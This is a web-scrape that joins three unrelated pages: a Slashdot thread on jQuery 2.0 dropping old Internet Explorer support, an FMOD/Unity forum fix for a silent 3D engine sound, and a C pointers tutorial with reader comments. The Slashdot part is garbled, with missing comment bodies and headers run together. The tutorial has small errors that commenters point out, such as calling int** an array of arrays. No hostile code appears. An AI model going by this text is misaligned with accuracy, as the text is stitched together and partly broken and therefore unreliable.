... printf( "myNumber: %f\n", myNumber ); printf( "myNumberCopy: %f\n", myNumberCopy ); printf( "myNumberPointer: %f\n", *myNumberPointer ); } Here's the output: myNumber: 2.000000 myNumberCopy: 1.618000 myNumberPointer: 2.000000
Change to
... printf( "myNumber: %f\n", myNumber ); printf( "myNumberCopy: %f\n", myNumberCopy ); printf( "*myNumberPointer: %f\n", *myNumberPointer ); } Here's the output: myNumber: 2.000000 myNumberCopy: 1.618000 *myNumberPointer: 2.000000
Steffen Frost — Sep 28, 09 6907
// declare an int variable and an int pointer variable int number; int* pointer;
My thinking was that a pointer had to be an integer since it was an address in memory, so that made sense. Then in a subsequent example you declared...
main () { float myNumber; float myNumberCopy; float * myNumberPointer; ...
This confused me, since how could an address, i.e. pointer, be a float? Later did I realize that the way to interpret "float* " or "int*" is, respectively, "a float's pointer" or "an integer's pointer". Another way to think of it is "a pointer for a integer variable" or "a pointer for a float variable".
Steffen Frost — Sep 28, 09 6908
#include
main ()
{
int number; // declare an int var
int* pointer; // declare an integer's pointer var
number = 5; //set value for 'number' var
pointer = &number; // pointer is 'addressof' (& operator) of num
printf (" number is: %i\n", number);
printf ("&number is: %p\n", &number); // the 'addressof' the num
printf ("pointer is: %p\n", pointer); // and here
printf ("*pointer is: %i\n", *pointer);
printf ("*&number is: %i\n", *&number); // contents of addressof the variabe
}
Steffen Frost — Sep 28, 09 6909
#include
main ()
{
int number; // declare an int var
number = 5; //set value for 'number' var
printf (" number is: %i\n", number);
printf (" &number is: %p\n", &number); // the 'addressof' the num
printf ("*&number is: %i\n", *&number); // contents of addressof the variabe
}
Bill — Oct 30, 09 6976
This allow the ++ operator to move forward the exact size of an int variable each time
Should be: this allows
Bill — Oct 30, 09 6977
Remember, a string is an array of individual characters, so a an array of strings is a two-dimension array of characters
Should be: so an array...
// In other words, go the beginning of the "array"
Should be: go to the beginning...
Bill Tubbs — Oct 30, 09 6978
When reading the code I just couldn't see how the calloc function could possibly be reserving enough memory. As far as I could see it reserves space for 5 pointers, not space for 5 entire strings. Not knowing that aspintf also allocates memory I couldn't see where the string data was being stored. Since the danger with pointers is overwriting memory that hasnt been allocated this was causing me some consternation!
I found this on the web. Hope it helps:
"The asprintf function is nearly identical to the simpler sprintf, but is much safer, because it dynamically allocates the string to which it sends output, so that the string will never overflow."
Thanks, all the tutorials are excellent.
Write paper — Jan 06, 10 7082
Buy term paper
Nitpicker — Feb 06, 10 7368 | http://theocacao.com/document.page/234 | CC-MAIN-2017-17 | refinedweb | 4,523 | 58.82 |
Introduction
Whenever we build any machine learning model, we feed it with initial data to train the model. And then we feed some unknown data (test data) to understand how well the model performs and generalized over unseen data. If the model performs well on the unseen data, it’s consistent and is able to predict with good accuracy on a wide range of input data; then this model is stable.
But this is not the case always! Machine learning models are not always stable and we have to evaluate the stability of the machine learning model. That is where Cross Validation comes into the picture.
“In simple terms, Cross-Validation is a technique used to assess how well our Machine learning models perform on unseen data”
According to Wikipedia, Cross-Validation is the process of assessing how the results of a statistical analysis will generalize to an independent data set.
There are many ways to perform Cross-Validation and we will learn about 4 methods in this article.
Let’s first understand the need for Cross-Validation!
Why do we need Cross-Validation?
Suppose you build a machine learning model to solve a problem, and you have trained the model on a given dataset. When you check the accuracy of the model on the training data, it is close to 95%. Does this mean that your model has trained very well, and it is the best model because of the high accuracy?
No, it’s not! Because your model is trained on the given data, it knows the data well, captured even the minute variations(noise), and has generalized very well over the given data. If you expose the model to completely new, unseen data, it might not predict with the same accuracy and it might fail to generalize over the new data. This problem is called over-fitting.
Sometimes the model doesn’t train well on the training set as it’s not able to find patterns. In this case, it wouldn’t perform well on the test set as well. This problem is called Under-fitting.
Image Source: fireblazeaischool.in
To overcome over-fitting problems, we use a technique called Cross-Validation.
Cross-Validation is a resampling technique with the fundamental idea of splitting the dataset into 2 parts- training data and test data. Train data is used to train the model and the unseen test data is used for prediction. If the model performs well over the test data and gives good accuracy, it means the model hasn’t overfitted the training data and can be used for prediction.
Let’s dive deep and learn about some of the model evaluation techniques.
1. Hold Out method
This is the simplest evaluation method and is widely used in Machine Learning projects. Here the entire dataset(population) is divided into 2 sets – train set and test set. The data can be divided into 70-30 or 60-40, 75-25 or 80-20, or even 50-50 depending on the use case. As a rule, the proportion of training data has to be larger than the test data.
Image Source: DataVedas
The data split happens randomly, and we can’t be sure which data ends up in the train and test bucket during the split unless we specify random_state. This can lead to extremely high variance and every time, the split changes, the accuracy will also change.
There are some drawbacks to this method:
- In the Hold out method, the test error rates are highly variable (high variance) and it totally depends on which observations end up in the training set and test set
- Only a part of the data is used to train the model (high bias) which is not a very good idea when data is not huge and this will lead to overestimation of test error.
One of the major advantages of this method is that it is computationally inexpensive compared to other cross-validation techniques.
Quick implementation of Hold Out method in Python
from sklearn.model_selection import train_test_split
Output
Train: [50, 10, 40, 20, 80, 90, 60] Test: [30, 100, 70]
Here, random_state is the seed used for reproducibility.
2. Leave One Out Cross-Validation
In this method, we divide the data into train and test sets – but with a twist. Instead of dividing the data into 2 subsets, we select a single observation as test data, and everything else is labeled as training data and the model is trained. Now the 2nd observation is selected as test data and the model is trained on the remaining data.
Image Source: ISLR
This process continues ‘n’ times and the average of all these iterations is calculated and estimated as the test set error.
When it comes to test-error estimates, LOOCV gives unbiased estimates (low bias). But bias is not the only matter of concern in estimation problems. We should also consider variance.
LOOCV has an extremely high variance because we are averaging the output of n-models which are fitted on an almost identical set of observations, and their outputs are highly positively correlated with each other.
And you can clearly see this is computationally expensive as the model is run ‘n’ times to test every observation in the data. Our next method will tackle this problem and give us a good balance between bias and variance.
Quick implementation of Leave One Out Cross-Validation in Python
from sklearn.model_selection import LeaveOneOut
X = [10,20,30,40,50,60,70,80,90,100] l = LeaveOneOut() for train, test in l.split(X): print("%s %s"% (train,test))
Output
]
This output clearly shows how LOOCV keeps one observation aside as test data and all the other observations go to train data.
3. K-Fold Cross-Validation
In this resampling technique, the whole data is divided into k sets of almost equal sizes. The first set is selected as the test set and the model is trained on the remaining k-1 sets. The test error rate is then calculated after fitting the model to the test data.
In the second iteration, the 2nd set is selected as a test set and the remaining k-1 sets are used to train the data and the error is calculated. This process continues for all the k sets.
Image Source: Wikipedia
The mean of errors from all the iterations is calculated as the CV test error estimate.
In K-Fold CV, the no of folds k is less than the number of observations in the data (k<n) and we are averaging the outputs of k fitted models that are somewhat less correlated with each other since the overlap between the training sets in each model is smaller. This leads to low variance then LOOCV.
The best part about this method is each data point gets to be in the test set exactly once and gets to be part of the training set k-1 times. As the number of folds k increases, the variance also decreases (low variance). This method leads to intermediate bias because each training set contains fewer observations (k-1)n/k than the Leave One Out method but more than the Hold Out method.
Typically, K-fold Cross Validation is performed using k=5 or k=10 as these values have been empirically shown to yield test error estimates that neither have high bias nor high variance.
The major disadvantage of this method is that the model has to be run from scratch k-times and is computationally expensive than the Hold Out method but better than the Leave One Out method.
Simple implementation of K-Fold Cross-Validation in Python
from sklearn.model_selection import KFold
X = ["a",'b','c','d','e','f'] kf = KFold(n_splits=3, shuffle=False, random_state=None) for train, test in kf.split(X): print("Train data",train,"Test data",test)
Output
Train: [2 3 4 5] Test: [0 1] Train: [0 1 4 5] Test: [2 3] Train: [0 1 2 3] Test: [4 5]
4. Stratified K-Fold Cross-Validation
This is a slight variation from K-Fold Cross Validation, which uses ‘stratified sampling’ instead of ‘random sampling.’
Let’s quickly understand what stratified sampling is and how is it different from random sampling.
Suppose your data contains reviews for a cosmetic product used by both the male and female population. When we perform random sampling to split the data into train and test sets, there is a possibility that most of the data representing males is not represented in training data but might end up in test data. When we train the model on sample training data that is not a correct representation of the actual population, the model will not predict the test data with good accuracy.
This is where Stratified Sampling comes to the rescue. Here the data is split in such a way that it represents all the classes from the population.
Let’s consider the above example which has a cosmetic product review of 1000 customers out of which 60% is female and 40% is male. I want to split the data into train and test data in proportion (80:20). 80% of 1000 customers will be 800 which will be chosen in such a way that there are 480 reviews associated with the female population and 320 representing the male population. In a similar fashion, 20% of 1000 customers will be chosen for the test data ( with the same female and male representation).
Image Source: stackexchange.com
This is exactly what stratified K-Fold CV does and it will create K-Folds by preserving the percentage of sample for each class. This solves the problem of random sampling associated with Hold out and K-Fold methods.
Quick implementation of Stratified K-Fold Cross-Validation in Python
from sklearn.model_selection import StratifiedKFold
X = np.array([[1,2],[3,4],[5,6],[7,8],[9,10],[11,12]]) y= np.array([0,0,1,0,1,1]) skf = StratifiedKFold(n_splits=3,random_state=None,shuffle=False) for train_index,test_index in skf.split(X,y): print("Train:",train_index,'Test:',test_index) X_train,X_test = X[train_index], X[test_index] y_train,y_test = y[train_index], y[test_index]
Output
Train: [1 3 4 5] Test: [0 2] Train: [0 2 3 5] Test: [1 4] Train: [0 1 2 4] Test: [3 5]
The output clearly shows the stratified split done based on the classes ‘0’ and ‘1’ in ‘y’.
Bias – Variance Tradeoff
When we consider the test error rate estimates, K-Fold Cross Validation gives more accurate estimates than Leave One Out Cross-Validation. Whereas Hold One Out CV method usually leads to overestimates of the test error rate, because in this approach, only a portion of the data is used to train the machine learning model.
When it comes to bias, the Leave One Out Method gives unbiased estimates because each training set contains n-1 observations (which is pretty much all of the data). K-Fold CV leads to an intermediate level of bias depending on the number of k-folds when compared to LOOCV but it’s much lower when compared to the Hold Out Method.
To conclude, the Cross-Validation technique that we choose highly depends on the use case and bias-variance trade-off.
If you have read this article this far, here is a quick bonus for you 👏
sklearn.model_selection has a method cross_val_score which simplifies the process of cross-validation. Instead of iterating through the complete data using the ‘split’ function, we can use cross_val_score and check the accuracy score for the chosen cross-validation method
You can check out my Github for python implementation of different cross-validation methods on the UCI Breast Cancer data from Kaggle.
Below are some of my articles on Machine Learning
Artificial Intelligence Vs Machine Learning Vs Deep Learning -What exactly is the difference between these buzzwords?
A Comprehensive Guide to Data Analysis using Pandas
If you would like to share your thoughts, you can connect with me on LinkedIn.
Happy Learning!
The media shown in this article are not owned by Analytics Vidhya and is used at the Author’s discretion.You can also read this article on our Mobile APP
| https://www.analyticsvidhya.com/blog/2021/05/4-ways-to-evaluate-your-machine-learning-model-cross-validation-techniques-with-python-code/ | CC-MAIN-2021-25 | refinedweb | 2,035 | 59.94 |
I am working on a program with the following requirements:
Write a program to calculate the average of all scores entered between 0 and 100. Use a sentinel-controlled loop variable to terminate the loop. After values are entered and the average calculated, test the average to determine whether an A, B, C, D, or F should be recorded. The scoring rubric is as follows:
A—90-100; B—80-89; C—70-79; D—60-69; F < 60
Here is what I have so far:
using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Threading.Tasks; namespace PRG205_FinalAssessment_Doyle { class Program { static void Main(string[] args) { int[] marks; int minput = 1, counter = 0, total = 0; float aveg = 0.0f; String Gradeletter = "C"; marks = new int[100]; Console.WriteLine("Enter Student Grade"); while (minput > 0) { minput = Convert.ToInt32(Console.ReadLine()); if (minput >= 0) { marks[counter++] = minput; total += minput; Console.WriteLine("Enter student grade or any negative value to calculate average"); | https://www.daniweb.com/programming/software-development/threads/499381/program-to-calculate-a-grade | CC-MAIN-2018-05 | refinedweb | 164 | 51.34 |
Hi community,
I’m quite used to Java, however I’m starting with Processing.
My aim is to make a realtime slit-scan effect, with the Pi camera (V2) and RPi3.
The following code is working, and I’m yet impressed by the Processing ability to generate a quite constant frame-rate.
Ideally I would like to achive the high frame rate ability of the camera module V2, around 120/180 fps. So my question is in two part.
First, do we have the possibility to change other settings of the camera, such as shutter speed, iso ?
And secondly:
This code is working at about 20fps. It relies on the PImage.copy() method to store the large rotating image buffer and rebuild the time scanned output image.
Is there a better - more efficient strategy for the buffer and reconstruction ?
Thanks a lot, and if Processing team reads this: kudos for this nice job!
import gohai.glvideo.*; GLCapture video; PImage img[]; int imgIndex = 0; PImage imgDest; void setup() { size(256, 256, P2D); // Important to note the renderer // Get the list of cameras connected to the Pi String[] devices = GLCapture.list(); println("Devices:"); printArray(devices); // Get the resolutions and framerates supported by the first camera if (0 < devices.length) { String[] configs = GLCapture.configs(devices[0]); println("Configs:"); printArray(configs); } // this will use the first recognized camera by default //video = new GLCapture(this); // you could be more specific also, e.g. //video = new GLCapture(this, devices[0]); video = new GLCapture(this, devices[0], 256, 256, 90); //video = new GLCapture(this, devices[0], configs[0]); img = new PImage[256]; imgDest = createImage(256, 256, RGB); for (int j = 0; j < img.length; j++) { img[j] = createImage(256, 256, RGB); } video.start(); } void draw() { background(0); // If the camera is sending new data, capture that data if (video.available()) { video.read(); img[imgIndex%256].copy(video, 0,0,256,256,0,0,256,256); for(int i=0; i<256; i++){ imgDest.copy(img[(imgIndex + i)%256], i, 0, 1, 256, i, 0, 1, 256); } imgIndex++; } image(imgDest, 0, 0, 256, 256); } | https://discourse.processing.org/t/need-of-advice-to-improve-glcapture-code-and-large-buffer/6605 | CC-MAIN-2022-27 | refinedweb | 346 | 65.12 |
Github user paul-rogers commented on a diff in the pull request:
--- Diff: common/src/test/java/org/apache/drill/test/DirTestWatcher.java ---
@@ -32,23 +32,50 @@
public class DirTestWatcher extends TestWatcher {
private String dirPath;
private File dir;
+ private boolean deleteDirAtEnd = true;
--- End diff --
Thanks for the Javadoc added previously. Perhaps add a section on how to use this class.
If I need a test directory, do I create an instance of this class? Or, does JUnit do it for
me? If done automagically, how do I get a copy of the directory?
If this is explained in JUnit, perhaps just reference that information. Even better would
be a short example:
> To get a test directory:
```
// Do something here
File myDir = // do something
```
--- | http://mail-archives.apache.org/mod_mbox/drill-dev/201710.mbox/%3C20171018222340.6D2EADFA3C@git1-us-west.apache.org%3E | CC-MAIN-2018-05 | refinedweb | 123 | 57.37 |
Can only save first 28 frames from a video with 31830 frames
I have an issue where I try to save a video into a sequence of images but it is only able to save 28 frames. I have 31830 frames to save but ret becomes a false on the 28th frame. I have checked the video and it is not corrupt. What could the issue be ?
import numpy as np import matplotlib.pyplot as plt import cv2 import sys import time from tqdm import tqdm inp = sys.argv[1] out = sys.argv[2] cap = cv2.VideoCapture(inp) i = 0 pbar = tqdm(total=int(cap.get(cv2.CAP_PROP_FRAME_COUNT))) while(cap.isOpened()): ret, im = cap.read() #print(ret) #break if(ret == True): cv2.imwrite(out + str(i).zfill(10) + ".png", im, [int(cv2.IMWRITE_PNG_COMPRESSION), 0]) pbar.update(1) print(i) i=i+1 else: break
For this kind of task, you should use FFmpeg:
ffmpeg -i myvideo.avi -vf fps=30 img%06d.png
Change fps accordingly. | https://answers.opencv.org/question/201751/can-only-save-first-28-frames-from-a-video-with-31830-frames/?sort=latest | CC-MAIN-2021-21 | refinedweb | 166 | 88.43 |
Many companies send their bills as PDF documents. In most cases, the most useful part of the document is just the bill but unfortunately it will be buried under a whole lot of other pages.
Using PDFOne Java, we can just read the document, take a snap of the page where the bill is located, and save it as an image. This way the images will contain just the bills. Finding the bills in these images will be easier than opening the actual PDF documents.
In this tip, we will see how to accomplish this using one of the overloaded
PdfDocument.saveAsImage() methods.
```
import java.io.IOException;
import com.gnostice.pdfone.PDFOne;
import com.gnostice.pdfone.PdfDocument;
import com.gnostice.pdfone.PdfException;

public class PdfSaveAsImage_Example {
    static {
        PDFOne.activate("your-activation-key", "your-product-key");
    }

    public static void main(String[] args) throws IOException, PdfException {
        // Open a PDF document
        PdfDocument doc1 = new PdfDocument();
        doc1.load("Input_Docs\\sample_doc.pdf");

        // Save page 10 as a 96-dpi JPEG image
        doc1.saveAsImage("jpg",              // format
                         "10",               // page number
                         "image96_of_page#", // image prefix
                         ".\\Output_Docs",   // output directory
                         96);                // DPI

        // Save page 10 as a 204-dpi JPEG image
        doc1.saveAsImage("jpg", "10", "image204_of_page#", ".\\Output_Docs", 204);

        // Close the PDF document
        doc1.close();
    }
}
```
In the above code snippet, we export a PDF page at different resolutions - one at the common 96 dpi and another at a high 204 dpi. Keeping the source document as PDF turns out great for high-resolution image export. Check the results down below.
(asthetics) I know it can be done easily with a windows project, but how can you make a program invisible? even without iostream header file, the console box still appears. Any way to make it go away?
Behind me lies another fallen soldier...
On the Win32 platform, one solution is to design the process as a service.
Kuphryn
Or start the console application using this:

```
#include <windows.h>
#include <iostream>
using namespace std;

bool HideConsoleWindow()
{
    char title[MAX_PATH];
    HWND hwnd;

    // NOTE: if you have 2000/XP and latest Platform SDK, then you can simply
    // call GetConsoleWindow() and pass that to ShowWindow()
    if (GetConsoleTitleA(title, sizeof(title)) &&
        ((hwnd = FindWindowA(NULL, title)) != NULL) &&
        ShowWindow(hwnd, SW_HIDE))
    {
        return true;
    }//if

    return false;
}//HideConsoleWindow

int main()
{
    if (HideConsoleWindow())
        MessageBoxA(NULL, "You can't see me!", "<Nelson>:Ha-Ha", MB_OK);
    else
        cout << "Didn't work, ec = " << GetLastError() << endl;

    return 0;
}//main
```
```
bool StartAppHidden(char *command)
{
    PROCESS_INFORMATION ProcInfo = {0};
    STARTUPINFO si = {0};
    si.cb = sizeof(STARTUPINFO);
    si.dwFlags = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_HIDE;

    BOOL bSuccess;
    bSuccess = CreateProcessA(NULL, command, NULL, NULL, FALSE, 0,
                              NULL, NULL, &si, &ProcInfo);
    if (!bSuccess)
        return false;

    CloseHandle(ProcInfo.hThread);
    CloseHandle(ProcInfo.hProcess);
    return true;
}//StartAppHidden
```

gg
There is an easy answer: if you are using Dev-C++, go to "Linker" and write Yes instead of No on the "Make a console window" option.
It makes sense if it's impossible; MS-DOS doesn't have multitasking capabilities, and what I really want to do is make a simple program with no console box. Yes, I am using Dev-C++, and I already tried the Windows option. But whenever I include windows.h my compile time doubles, so I guess I'll just make it a Windows application.
Behind me lies another fallen soldier...
>> ...MS-DOS doesn't have multitasking capabilities...
Dev-C++ creates 32-bit console applications with all the capabilities of 32-bit GUI applications. The only difference is that the OS creates a console window for you and hooks up standard input and standard output to that window.
Any technique you use will require windows.h, so you might as well do it the WinMain() way.
gg | http://cboard.cprogramming.com/cplusplus-programming/55388-console-boxes.html | CC-MAIN-2014-49 | refinedweb | 436 | 56.45 |
mmap(), mmap64()
Map a memory region into a process's address space
Synopsis:
```
#include <sys/mman.h>

void * mmap( void * addr,
             size_t len,
             int prot,
             int flags,
             int fildes,
             off_t off );

void * mmap64( void * addr,
               size_t len,
               int prot,
               int flags,
               int fildes,
               off64_t off );
```
Arguments:
- addr
- NULL, or a pointer to where you want the object to be mapped in the calling process's address space.
- len
- The number of bytes to map into the caller's address space. It can't be 0.
- prot
- The access capabilities that you want to use for the memory region being mapped. You can combine the protection bits PROT_READ, PROT_WRITE, PROT_EXEC, and PROT_NONE.
- flags
- Flags that specify further information about handling the mapped region. POSIX defines the following:
- MAP_PRIVATE
- MAP_SHARED
- MAP_FIXED
The remaining flags are Unix or QNX Neutrino extensions.
Library:
libc
Use the -l c option to qcc to link against this library. This library is usually included automatically.
Description:
The mmap() function maps a region within the object specified by fildes, beginning at offset off and continuing for len bytes, into the caller's address space and returns the location. The object that you map from can be one of the following:
- a file, opened with open()
- a shared memory object, opened with shm_open()
- a typed memory object, opened with posix_typed_mem_open()
- physical memory — specify NOFD for fildes
If you want to map a device's physical memory, use mmap_device_memory() instead of mmap(); if you want to map a device's registers, use mmap_device_io().
If fildes isn't NOFD, you must have opened the file descriptor for reading, no matter what value you specify for prot; write access is also required for PROT_WRITE if you haven't specified MAP_PRIVATE.
Figure: Mapping memory with mmap().
Typically, you don't need to use addr; you can just pass NULL instead. If you set addr to a non-NULL value, whether the object is mapped depends on whether or not you set MAP_FIXED in flags:
- MAP_FIXED is set
- The object is mapped to the address in addr, or the function fails.
- MAP_FIXED isn't set
- The value of addr is taken as a hint as to where to map the object in the calling process's address space. The mapped area won't overlay any current mapped areas.
There are two parts to the flags parameter. The first part is a type (masked by the MAP_TYPE bits), which must be one of the sharing types listed above (MAP_SHARED or MAP_PRIVATE). The second part consists of modifier flags, including the following:
- MAP_FIXED
- Map the object to the address specified by addr. If this area is already mapped, the call changes the existing mapping of the area.
A memory area being mapped with MAP_FIXED is first unmapped by the system using the same memory area. See munmap() for details.
- MAP_LAZY
- Delay acquiring system memory, and copying or zero-filling the MAP_PRIVATE or MAP_ANON pages, until an access to the area has occurred. If you set this flag, and there's no system memory at the time of the access, the thread gets a SIGBUS with a code of BUS_ADRERR. This flag is a hint to the memory manager.
For anonymous shared memory objects (those created via mmap() with MAP_ANON | MAP_SHARED and a file descriptor of -1), a MAP_LAZY flag implicitly sets the SHMCTL_LAZY flag on the object (see shm_ctl()).
- MAP_NOINIT
- When specified, the POSIX requirement that the memory be zeroed is relaxed. For details, see the QNX Neutrino Programmer's Guide.
Errors:
- ENXIO: The address from off for len bytes is invalid for the requested object.
Classification:
mmap() is POSIX 1003.1 (MF|SHM|TYM); mmap64() is a large-file support extension.
See also:
mmap_device_io(), mmap_device_memory(), munmap(), msync(), posix_typed_mem_open(), setrlimit(), shm_open()
“Shared memory” and “Typed memory” in the Interprocess Communication (IPC) chapter of the System Architecture guide | http://www.qnx.com/developers/docs/6.4.1/neutrino/lib_ref/m/mmap.html | CC-MAIN-2017-17 | refinedweb | 608 | 62.48 |
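The reference above documents the C API, but the semantics are easy to experiment with from Python, whose standard mmap module wraps the same underlying call. In this minimal sketch (the scratch file and its contents are arbitrary), a file is mapped shared and writable, so a store through the mapping reaches the file itself:

```python
import mmap
import os
import tempfile

def demo():
    # Create a small scratch file to map (path chosen by tempfile).
    fd, path = tempfile.mkstemp()
    os.write(fd, b"hello, mmap!")
    os.close(fd)
    try:
        with open(path, "r+b") as f:
            # In spirit: mmap(NULL, len, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0)
            with mmap.mmap(f.fileno(), 0) as m:
                m[0:5] = b"HELLO"          # store through the mapping
        with open(path, "rb") as f:        # reread from the file itself
            return f.read()
    finally:
        os.unlink(path)

data = demo()
```

Rereading the file shows the bytes written through the mapping, mirroring the MAP_SHARED behaviour described above.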
Introduction
In this article, we will be using the Wikipedia API to retrieve data from Wikipedia. Data scraping has seen a rapid surge owing to the increasing use of data analytics and machine learning tools. The Internet is the single largest source of information, and therefore it is important to know how to fetch data from various sources. And with Wikipedia being one of the largest and most popular sources for information on the Internet, this is a natural place to start.
In this article, we will see how to use Python's Wikipedia API to fetch a variety of information from Wikipedia.
Once the installation is done (the package can be installed with pip install wikipedia), we can use the Wikipedia API in Python to extract information from Wikipedia. In order to call the methods of the Wikipedia module in Python, we need to import it using the following command.
import wikipedia
Searching Titles and Suggestions
The
search() method does a Wikipedia search for a query that is supplied as an argument to it. As a result, this method returns a list of all the article's titles that contain the query. For example:
import wikipedia print(wikipedia.search("Bill"))
Output:
['Bill', 'The Bill', 'Bill Nye', 'Bill Gates', 'Bills, Bills, Bills', 'Heartbeat bill', 'Bill Clinton', 'Buffalo Bill', 'Bill & Ted', 'Kill Bill: Volume 1']
As you see in the output, the searched title along with the related search suggestions are displayed. You can configure the number of search titles returned by passing a value for the
results parameter, as shown here:
import wikipedia print(wikipedia.search("Bill", results=2))
Output:
['Bill', 'The Bill']
The above code prints only 2 search results of the query since that is how many we requested to be returned.
Let's say we need to get the Wikipedia search suggestions for a search title, "Bill Cliton" that is incorrectly entered or has a typo. The
suggest() method returns suggestions related to the search query entered as a parameter to it, or it will return "None" if no suggestions were found.
Let's try it out here:
import wikipedia print(wikipedia.suggest("Bill cliton"))
Output:
bill clinton
You can see that it took our incorrect entry, "Bill cliton", and returned the correct suggestion of "bill clinton".
Extracting Wikipedia Article Summary
We can extract the summary of a Wikipedia article using the
summary() method. The article for which the summary needs to be extracted is passed as a parameter to this method.
Let's extract the summary for "Ubuntu":
print(wikipedia.summary("Ubuntu"))
Output:
Ubuntu ( (listen)) is a free and open-source Linux distribution based on Debian. Ubuntu is officially released in three editions: Desktop, Server, and Core (for the internet of things devices and robots). Ubuntu is a popular operating system for cloud computing, with support for OpenStack. Ubuntu is released every six months, with long-term support (LTS) releases every two years. The latest release is .... Canonical generates revenue through the sale of premium services related to Ubuntu. Ubuntu is named after the African philosophy of Ubuntu, which Canonical translates as "humanity to others" or "I am what I am because of who we all are".
The whole summary is printed in the output. We can customize the number of sentences in the summary text to be displayed by configuring the
sentences argument of the method.
print(wikipedia.summary("Ubuntu", sentences=2))
Output:
Ubuntu ( (listen)) is a free and open-source Linux distribution based on Debian. Ubuntu is officially released in three editions: Desktop, Server, and Core (for the internet of things devices and robots).
As you can see, only 2 sentences of Ubuntu's text summary is printed.
However, keep in mind that
wikipedia.summary will raise a "disambiguation error" if the page does not exist or the page is disambiguous. Let's see an example.
print(wikipedia.summary("key"))
The above code throws a
DisambiguationError since there are many articles that would match "key".
Output:
Traceback (most recent call last): File "<stdin>", line 1, in <module> File "/Library/Python/2.7/site-packages/wikipedia/util.py", line 28, in __call__ ret = self._cache[key] = self.fn(*args, **kwargs) File "/Library/Python/2.7/site-packages/wikipedia/wikipedia.py", line 231, in summary page_info = page(title, auto_suggest=auto_suggest, redirect=redirect) File "/Library/Python/2.7/site-packages/wikipedia/wikipedia.py", line 276, in page return WikipediaPage(title, redirect=redirect, preload=preload) File "/Library/Python/2.7/site-packages/wikipedia/wikipedia.py", line 299, in __init__ self.__load(redirect=redirect, preload=preload) File "/Library/Python/2.7/site-packages/wikipedia/wikipedia.py", line 393, in __load raise DisambiguationError(getattr(self, 'title', page['title']), may_refer_to) wikipedia.exceptions.DisambiguationError: "Key" may refer to: Key (cryptography) Key (lock) Key (map) ...
If you had wanted the summary on a "cryptography key", for example, then you'd have to enter it as the following:
print(wikipedia.summary("Key (cryptography)"))
With the more specific query we now get the correct summary in the output.
Retrieving Full Wikipedia Page Data
In order to get the contents, categories, coordinates, images, links and other metadata of a Wikipedia page, we must first get the Wikipedia page object or the page ID for the page. To do this, the
page() method is used, with the page title passed as an argument to the method.
Look at the following example:
wikipedia.page("Ubuntu")
This method call will return a
WikipediaPage object, which we'll explore more in the next few sections.
Extracting Metadata of a Page
To get the complete plain text content of a Wikipedia page (excluding images, tables, etc.), we can use the
content attribute of the
page object.
print(wikipedia.page("Python").content)
Output:

... Python was conceived in the late 1980s as a successor to the ABC language. Python 2.0, released 2000, introduced features like list comprehensions and a garbage collection system capable of collecting reference cycles. ...
Similarly, we can get the URL of the page using the
url attribute:
print(wikipedia.page("Python").url)
Output:
We can get the URLs of external links on a Wikipedia page by using the
references property of the
WikipediaPage object.
print(wikipedia.page("Python").references)
Output:
[u';66665771', u'', u'', u'', u'', ...]
The
title property of the
WikipediaPage object can be used to extract the title of the page.
print(wikipedia.page("Python").title)
Output:
Python (programming language)
Similarly, the
categories attribute can be used to get the list of categories of a Wikipedia page:
print(wikipedia.page("Python").categories)
Output
['All articles containing potentially dated statements', 'Articles containing potentially dated statements from August 2016', 'Articles containing potentially dated statements from December 2018', 'Articles containing potentially dated statements from March 2018', 'Articles with Curlie links', 'Articles with short description', 'Class-based programming languages', 'Computational notebook', 'Computer science in the Netherlands', 'Cross-platform free software', 'Cross-platform software', 'Dutch inventions', 'Dynamically typed programming languages', 'Educational programming languages', 'Good articles', 'High-level programming languages', 'Information technology in the Netherlands', 'Object-oriented programming languages', 'Programming languages', 'Programming languages created in 1991', 'Python (programming language)', 'Scripting languages', 'Text-oriented programming languages', 'Use dmy dates from August 2015', 'Wikipedia articles with BNF identifiers', 'Wikipedia articles with GND identifiers', 'Wikipedia articles with LCCN identifiers', 'Wikipedia articles with SUDOC identifiers']
The
links element of the
WikipediaPage object can be used to get the list of titles of the pages whose links are present in the page.
print(wikipedia.page("Ubuntu").links)
Output
[u'/e/ (operating system)', u'32-bit', u'4MLinux', u'ALT Linux', u'AMD64', u'AOL', u'APT (Debian)', u'ARM64', u'ARM architecture', u'ARM v7', ...]
Finding Pages Based on Coordinates
The
geosearch() method is used to do a Wikipedia geo search using latitude and longitude arguments supplied as float or decimal numbers to the method.
print(wikipedia.geosearch(latitude, longitude))
As you see, the above method returns articles based on the coordinates provided.
Similarly, we can set the coordinates property of the
page() and get the articles related to the geolocation. For example:
print(wikipedia.page(...))
Language Settings
You can customize the language of a Wikipedia page to your native language, provided the page exists in your native language. To do so, you can use the
set_lang() method. Each language has a standard prefix code which is passed as an argument to the method. For example, let's get the first 2 sentences of the summary text of "Ubuntu" wiki page in the German language.
wikipedia.set_lang("de")
print(wikipedia.summary("ubuntu", sentences=2))
Output
Ubuntu (auch Ubuntu Linux) ist eine Linux-Distribution, die auf Debian basiert. Der Name Ubuntu bedeutet auf Zulu etwa „Menschlichkeit“ und bezeichnet eine afrikanische Philosophie.
You can check the list of currently supported ISO languages along with its prefix, as follows:
print(wikipedia.languages())
Retrieving Images in a Wikipedia Page
The
images list of the
WikipediaPage object can be used to fetch images from a Wikipedia page. For instance, the following script returns the first image from Wikipedia's Ubuntu page:
print(wikipedia.page("ubuntu").images[0])
Output
The above code returns the URL of the image present at index 0 in the Wikipedia page.
To see the image, you can copy and paste the above URL into your browser.
Retreiving Full HTML Page Content
To get the full Wikipedia page in HTML format, you can use the following script:
print(wikipedia.page("Ubuntu").html())
Output
<div class="mw-parser-output"><div role="note" class="hatnote navigation-not-searchable">For the African philosophy, see <a href="/wiki/Ubuntu_philosophy" title="Ubuntu philosophy">Ubuntu philosophy</a>. For other uses, see <a href="/wiki/Ubuntu_(disambiguation)" class="mw-disambig" title="Ubuntu (disambiguation)">Ubuntu (disambiguation)</a>.</div> <div class="shortdescription nomobile noexcerpt noprint searchaux" style="display:none">Linux distribution based on Debian</div> ...
As seen in the output, the entire page in HTML format is displayed. This can take a bit longer to load if the page size is large, so keep in mind that it can raise an
HTTPTimeoutError when a request to the server times out.
Conclusion
In this tutorial, we had a glimpse of using the Wikipedia API for extracting data from the web. We saw how to get a variety of information such as a page's title, category, links, images, and retrieve articles based on geo-locations. | https://stackabuse.com/getting-started-with-pythons-wikipedia-api/ | CC-MAIN-2019-43 | refinedweb | 1,696 | 53.1 |
